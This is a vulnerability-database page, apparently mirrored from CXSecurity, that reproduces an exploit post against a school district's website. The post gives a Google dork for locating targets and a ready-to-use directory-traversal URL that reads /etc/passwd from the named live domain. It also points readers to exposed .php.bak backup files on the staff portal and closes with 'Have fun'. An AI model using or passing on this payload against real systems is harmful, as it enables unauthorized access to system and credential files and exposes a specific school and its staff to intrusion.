Geneseo Schools Directory Traversal - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1611552 漏洞类型
发布时间 2019-05-16 更新时间 2019-05-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050172
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#########################################################################################
# Exploit Title : Geneseo Schools, Directory Traversal
# Google Dork : inurl:'index.php?page='' .php
# Exploit Author: null
# Vendor Homepage: http://www.dist228.org/index.php/
# Contact : mikayil.ilyasov@gmail.com
# Software Link: N/A
# Version : N/A
# Date: 16.05.2019
# Tested on: Windows 10, Kali Linux 
# CVE: 
##########################################################################################

+ Exploit : 

- http://www.dist228.org/index.php?page=../../../etc/passwd

+ There are also .php.bak files at http://www.dist228.org/staffportal/.

Have fun